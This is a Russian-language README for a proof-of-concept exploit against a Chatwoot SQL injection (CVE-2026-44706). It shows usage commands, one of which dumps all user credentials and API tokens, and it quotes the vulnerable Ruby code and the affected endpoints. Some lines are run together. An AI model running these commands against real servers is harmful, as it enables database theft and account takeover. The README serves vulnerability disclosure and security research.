
Chatwoot SQL-инъекция в FilterService
Эксплойт proof-of-concept для CVE-2026-44706 — уязвимости SQL-инъекции в FilterService#lt_gt_filter_values чат-бота Chatwoot, которая позволяет любому аутентифицированному агенту прочитать всю базу данных PostgreSQL, включая учётные данные пользователей и токены API. Прочитайте полную статью здесь.
Использование:
# Verify injection (boolean-based)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check
# Time-based confirmation
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased
# Extract arbitrary SQL query result
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"
# Dump all user credentials and API tokens
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds
В app/services/filter_service.rb (строка 91) пользовательский ввод напрямую интерполируется в SQL без параметризации:
def lt_gt_filter_values(query_hash)
value = query_hash['values'][0] # ← user input, no sanitization
operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
"#{operator} '#{value}'::#{attribute_data_type}" # ← raw interpolation
end
Все остальные операторы в этом классе используют привязку параметров (:value_N). Уязвимы только is_greater_than и is_less_than.
POST /api/v1/accounts/:id/conversations/filterPOST /api/v1/accounts/:id/contacts/filterCWE-89 SQL-инъекция. Любой аутентифицированный агент/администратор может:
pg_sleep() для исчерпания соединений с базой данных8.8 Высокий CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Этот инструмент предназначен только для образовательных и исследовательских целей. Используйте его только в системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этой программой.
QuimeraX Intelligence — это продвинутая платформа EASM и Cyber Threat Intelligence, специализирующаяся на выявлении критических уязвимостей в сложных системах. Платформа активно мониторит, обнаруживает и оповещает клиентов об угрозах безопасности, обеспечивая прозрачность и быструю реакцию на потенциальные риски. Клиенты получают немедленные уведомления и подробные отчёты, если их системы оказываются уязвимыми, что позволяет им принять защитные меры. узнать больше
Hakai Security — это компания по кибербезопасности, основанная профессионалами в области безопасности, приверженная техническому совершенству. Мы предлагаем индивидуальные решения по безопасности, включая продвинутое тестирование на проникновение, реалистичные симуляции Red Team и практики безопасной разработки, чтобы активно защищать активы наших клиентов от развивающихся киберугроз.
Hacking Club — это обучающая платформа, где вы изучаете кибербезопасность с помощью практических уроков, лабораторных работ и заданий, созданных экспертами из нашей консалтинговой фирмы по безопасности: прямо с поля боя к вашему обучению. Практикуйтесь в уязвимости, представленной в этом репозитории от hacking club! узнать больше